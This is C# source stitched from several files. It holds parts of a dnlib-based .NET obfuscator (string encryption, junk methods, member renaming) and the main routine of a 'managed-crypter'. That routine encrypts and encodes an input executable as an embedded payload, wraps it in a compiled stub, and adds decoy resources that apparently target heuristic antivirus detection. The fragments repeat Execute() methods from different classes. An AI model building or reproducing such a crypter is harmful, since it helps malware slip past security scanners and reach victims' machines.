/// <summary>
/// The return value for the randomly generated method. It can be an integer or a string.
/// </summary>
private static MethodDef CreateReturnMethodDef(object value, ModuleDefMD module)
{
CorLibTypeSig corlib = null;
if (value is int)
{
corlib = module.CorLibTypes.Int32;
}
else if (value is string)
{
corlib = module.CorLibTypes.String;
}
MethodDef newMethod = new MethodDefUser(GenerateRandomString(MemberRenamer.StringLength()),
MethodSig.CreateStatic(corlib, corlib),
MethodImplAttributes.IL | MethodImplAttributes.Managed,
MethodAttributes.Public | MethodAttributes.Static | MethodAttributes.HideBySig)
{
Body = new CilBody()
};
if (value is int)
{
newMethod.Body.Instructions.Add(Instruction.Create(OpCodes.Ldc_I4, Convert.ToInt32(value)));
}
else if (value is string)
{
newMethod.Body.Instructions.Add(Instruction.Create(OpCodes.Ldstr, value.ToString()));
}
newMethod.Body.Instructions.Add(OpCodes.Ret.ToInstruction());
return(newMethod);
}
public static void Execute()
{
ModuleDefMD typeModule = ModuleDefMD.Load(typeof(StringDecoder).Module);
TypeDef typeDef = typeModule.ResolveTypeDef(MDToken.ToRID(typeof(StringDecoder).MetadataToken));
IEnumerable <IDnlibDef> members = InjectHelper.Inject(typeDef, Program.Module.GlobalType,
Program.Module);
MethodDef init = (MethodDef)members.Single(method => method.Name == "Decrypt");
init.Rename(GenerateRandomString(MemberRenamer.StringLength()));
foreach (MethodDef method in Program.Module.GlobalType.Methods)
{
if (method.Name.Equals(".ctor"))
{
Program.Module.GlobalType.Remove(method);
break;
}
}
foreach (TypeDef type in Program.Module.Types)
{
if (type.IsGlobalModuleType)
{
continue;
}
foreach (MethodDef method in type.Methods)
{
if (!method.HasBody)
{
continue;
}
for (int i = 0; i < method.Body.Instructions.Count; i++)
{
if (method.Body.Instructions[i].OpCode == OpCodes.Ldstr)
{
string operand = method.Body.Instructions[i].Operand.ToString();
method.Body.Instructions[i].Operand = Encrypt(operand);
method.Body.Instructions.Insert(i + 1, OpCodes.Call.ToInstruction(init));
++Amount;
}
}
}
}
Console.WriteLine($" Encrypted {Amount} strings.");
}
/// <summary>
/// This obfuscation will add random junk methods to make the code harder to decrypt to people if they think the junk methods are actually used.
/// </summary>
public static void Execute()
{
foreach (TypeDef type in Program.Module.Types)
{
if (type.IsGlobalModuleType)
{
continue;
}
foreach (MethodDef _ in type.Methods.ToArray())
{
MethodDef strings = CreateReturnMethodDef(GenerateRandomString(MemberRenamer
.StringLength()), Program.Module);
MethodDef ints = CreateReturnMethodDef(MemberRenamer.StringLength(), Program.Module);
type.Methods.Add(strings);
++Amount;
type.Methods.Add(ints);
++Amount;
}
}
Console.WriteLine($" Added {Amount} junk methods.");
}
/// <summary>
/// Execution of the 'Renamer' method. It'll rename types, methods and their parameters, properties, fields and events to random strings. But before they get renamed, they get analyzed to see if they are good to be renamed. (That prevents the program being broken)
/// </summary>
public static void Execute()
{
if (Program.DontRename)
{
return;
}
Program.Module.Mvid = Guid.NewGuid();
Program.Module.Name = GenerateRandomString(MemberRenamer.StringLength());
Program.Module.EntryPoint.Name = GenerateRandomString(MemberRenamer.StringLength());
foreach (TypeDef type in Program.Module.Types)
{
foreach (MethodDef m in type.Methods)
{
if (CanRename(m) && !Program.ForceWinForms && !Program.FileExtension.Contains("dll"))
{
m.Name = GenerateRandomString(MemberRenamer.StringLength());
++MethodAmount;
}
foreach (Parameter para in m.Parameters)
{
if (CanRename(para))
{
para.Name = GenerateRandomString(MemberRenamer.StringLength());
++ParameterAmount;
}
}
}
foreach (PropertyDef p in type.Properties)
{
if (CanRename(p))
{
p.Name = GenerateRandomString(MemberRenamer.StringLength());
++PropertyAmount;
}
}
foreach (FieldDef field in type.Fields)
{
if (CanRename(field))
{
field.Name = GenerateRandomString(MemberRenamer.StringLength());
++FieldAmount;
}
}
foreach (EventDef e in type.Events)
{
if (CanRename(e))
{
e.Name = GenerateRandomString(MemberRenamer.StringLength());
++EventAmount;
}
}
}
Console.WriteLine($" Renamed {MethodAmount} methods.\n Renamed {ParameterAmount} parameters." +
$"\n Renamed {PropertyAmount} properties.\n Renamed {FieldAmount} fields.\n Renamed {EventAmount} events.");
}
static void Main(string[] args)
{
GenericFile cFile = null; /* file to crypt */
GenericFile lFile = null; /* lib */
GenericDirectory sDirectory = null; /* stub directory */
GenericDirectory lDirectory = null; /* lib directory */
cFile = new GenericFile("C:\\Users\\Admin\\Desktop\\bintext.exe", true);
sDirectory = new GenericDirectory(@"C:\Users\admin\Desktop\managed-crypter\managedcrypter\stub");
lDirectory = new GenericDirectory(@"C:\Users\admin\Desktop\managed-crypter\managedcrypter\lib");
/* compress -> xor -> b64 our input file */
cFile.EncryptData();
cFile.EncodeData();
Console.WriteLine("Sanity Check Exe: {0}", cFile.SanityCheck());
Console.WriteLine("Stub Directory: {0}", sDirectory.DirectoryPath);
foreach (string stubFile in sDirectory.Source.Files.Values)
{
Console.WriteLine("Stub File: {0}", stubFile);
}
Console.WriteLine("Lib Directory: {0}", lDirectory.DirectoryPath);
foreach (string libFile in lDirectory.Source.Files.Values)
{
Console.WriteLine("Lib File: {0}", libFile);
}
/* initialize both workspace */
sDirectory.CreateWorkspaceDirectory();
lDirectory.CreateWorkspaceDirectory();
#region Library Workspace
/***************************/
/* begin library workspace */
/***************************/
/* init lib workspace */
var lWorkspace = lDirectory.Workspace;
lWorkspace.AddChild("lib");
lWorkspace.AddChild("payload");
lWorkspace.AddChild("keyfile_payload");
lWorkspace.AnonymizeChildren();
/* write resources of lib */
lWorkspace.WriteAnonymous(lWorkspace.AnonymousChildren["keyfile_payload"], cFile.EncryptionKey);
lWorkspace.WriteAnonymous(lWorkspace.AnonymousChildren["payload"], cFile.EncodedData);
/* replace anonymous resource names in library*/
{
Utils.ReplaceStringInFile(
lDirectory.Source.Files["ResourceGetter"],
StringConstants.STR_PAYLOAD_KEY,
lWorkspace.AnonymousChildren["keyfile_payload"]);
Utils.ReplaceStringInFile(
lDirectory.Source.Files["ResourceGetter"],
StringConstants.STR_PAYLOAD_NAME,
lWorkspace.AnonymousChildren["payload"]);
}
Console.ReadLine();
/* compile our library */
using (GenericCompiler lCompiler = new GenericCompiler())
{
CompilerInfo cInfo = new CompilerInfo();
cInfo.GenerateLibrary = true;
cInfo.OutputDestination = lWorkspace.Children["lib"];
cInfo.EmbeddedResources.AddRange(Directory.GetFiles(lWorkspace.Parent));
cInfo.ExCompilerOptions.Add("/unsafe");
if (lCompiler.CompileSource(lDirectory, cInfo))
{
Console.WriteLine("Successfully compiled library!");
lFile = new GenericFile(cInfo.OutputDestination, false);
}
}
/***************************/
/* end library workspace */
/***************************/
#endregion
#region Stub Workspace
/***************************/
/* begin stub workspace */
/***************************/
/* init stub workspace */
var sWorkspace = sDirectory.Workspace;
sWorkspace.AddChild("keyfile_lib");
sWorkspace.AddChild("lib");
// do some renaming in our library
sWorkspace.Write("lib", lFile.OriginalFileData);
MemberRenamer.RenameMembers(sWorkspace.Children["lib"], sDirectory.Source.Files["stub_class"]);
lFile = new GenericFile(sWorkspace.Children["lib"], false);
sWorkspace.AnonymizeChildren();
/* encrypt our library */
lFile.EncryptData();
lFile.EncodeData();
Console.WriteLine("Sanity Check Lib: {0}", lFile.SanityCheck());
sWorkspace.WriteAnonymous(sWorkspace.AnonymousChildren["keyfile_lib"], lFile.EncryptionKey);
sWorkspace.WriteAnonymous(sWorkspace.AnonymousChildren["lib"], lFile.EncodedData);
/* replace anonymous resource names in stub */
{
Utils.ReplaceStringInFile(
sDirectory.Source.Files["GetKeyFile"],
StringConstants.STR_LIBRARY_KEY,
sWorkspace.AnonymousChildren["keyfile_lib"]);
Utils.ReplaceStringInFile(
sDirectory.Source.Files["GetLib"],
StringConstants.STR_LIBRARY_NAME,
sWorkspace.AnonymousChildren["lib"]);
}
/* primitive usg */
{
//StringBuilder sb = new StringBuilder();
//MethodGen mtdGen = new MethodGen();
//for (int i = 0; i < 20; i++)
// sb.AppendLine(mtdGen.RandMethod());
//Utils.ReplaceStringInFile(
// sDirectory.Source.Files["stub_class"],
// StringConstants.STR_JUNK,
// sb.ToString());
Utils.ReplaceJunkInSource(sDirectory.Source.Files["stub_class"]);
}
Console.ReadLine();
/* compile our stub */
using (GenericCompiler sCompiler = new GenericCompiler())
{
CompilerInfo cInfo = new CompilerInfo();
cInfo.GenerateExe = true;
cInfo.EmbeddedResources.AddRange(Directory.GetFiles(sWorkspace.Parent));
cInfo.OutputDestination = Path.Combine(
Environment.GetFolderPath(Environment.SpecialFolder.Desktop),
"TestFile.exe");
/* usg */
{
string root = @"C:\Windows\Microsoft.NET\Framework\v2.0.50727";
List <Assembly> asms = new List <Assembly>();
asms.Add(Assembly.LoadFrom(Path.Combine(root, "mscorlib.dll")));
asms.Add(Assembly.LoadFrom(Path.Combine(root, "System.dll")));
asms.Add(Assembly.LoadFrom(Path.Combine(root, "System.Windows.Forms.dll")));
asms.Add(Assembly.LoadFrom(Path.Combine(root, "System.Configuration.dll")));
asms.Add(Assembly.LoadFrom(Path.Combine(root, "System.Xml.dll")));
asms.Add(Assembly.LoadFrom(Path.Combine(root, "System.Drawing.dll")));
asms.Add(Assembly.LoadFrom(Path.Combine(root, "System.Deployment.dll")));
asms.Add(Assembly.LoadFrom(Path.Combine(root, "System.Security.dll")));
asms.Add(Assembly.LoadFrom(Path.Combine(root, "Accessibility.dll")));
List <Assembly> asms2 = new List <Assembly>();
foreach (var a in asms)
{
foreach (var asmRef in a.GetReferencedAssemblies())
{
asms2.Add(Assembly.LoadFrom(Path.Combine(root, string.Concat(asmRef.Name, ".dll"))));
}
}
asms2 = asms.Distinct().ToList();
foreach (var a in asms2)
{
cInfo.ReferencedAssemblies.Add(string.Concat(a.GetName().Name, ".dll"));
}
}
cInfo.ExCompilerOptions.Add("/nowarn:618");
if (sCompiler.CompileSource(sDirectory, cInfo))
{
Console.WriteLine("Successfully compiled stub!");
}
// MemberRenamer.RenameMembers(cInfo.OutputDestination);
ResourceGen.CreateHeurAcceleratorSet(cInfo.OutputDestination);
ResourceGen.CreateHeurDialogSet(cInfo.OutputDestination);
ResourceGen.CreateHeurMenuSet(cInfo.OutputDestination);
ResourceGen.CreateHeurStringSet(cInfo.OutputDestination);
}
/***************************/
/* end stub workspace */
/***************************/
#endregion
Console.ReadLine();
sDirectory.Source.Clean();
lDirectory.Source.Clean();
sWorkspace.Clear();
lWorkspace.Clear();
}
